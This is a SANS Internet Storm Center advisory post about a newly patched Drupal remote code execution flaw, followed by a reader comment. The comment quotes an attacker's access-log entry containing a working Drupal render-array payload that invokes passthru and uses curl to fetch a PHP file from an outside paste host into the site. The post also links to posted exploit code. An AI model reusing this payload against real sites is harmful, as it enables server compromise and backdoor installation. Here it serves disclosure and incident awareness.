Threat Level: green Handler on Duty: Rick Wanner

SANS ISC: Yet Another Drupal RCE Vulnerability - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Yet Another Drupal RCE Vulnerability

Drupal today released another patch addressing a remote code execution vulnerability. According to the advisory, the vulnerability is related to the issue patched about a month ago, but this variant has not been exploited yet. Please patch ASAP! 

An exploit for the vulnerability has been posted to pastebin [2] . This exploit does require authentication. 

With the March update, Drupal added a global sanitation function. This approach is often difficult to implement correctly. It is very difficult to sanitize and validate data before it is clear how it is being used, in particular if this is done for an existing and complex application like Drupal. We will see how this will work for Drupal in the long run.

[1] https://www.drupal.org/sa-core-2018-004
[2] https://pastebin.com/pRM8nmwj . (leads to exploit code)

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

Defending Web Applications Security Essentials - Secure DevOps Summit & Training 2018

Johannes

3372 Posts
ISC Handler
Not sure if this is a replacement for pastebin ?

it works just fine on a drupal 7.59 site.

/logs/access_log:89.40.123.197 - - [20/Jun/2018:10:49:49 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/installer.php+'https://hastebin.com/raw/ekacocutup.php' HTTP/1.0" 200 14857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
Anonymous

Sign Up for Free or Log In to start participating in the conversation!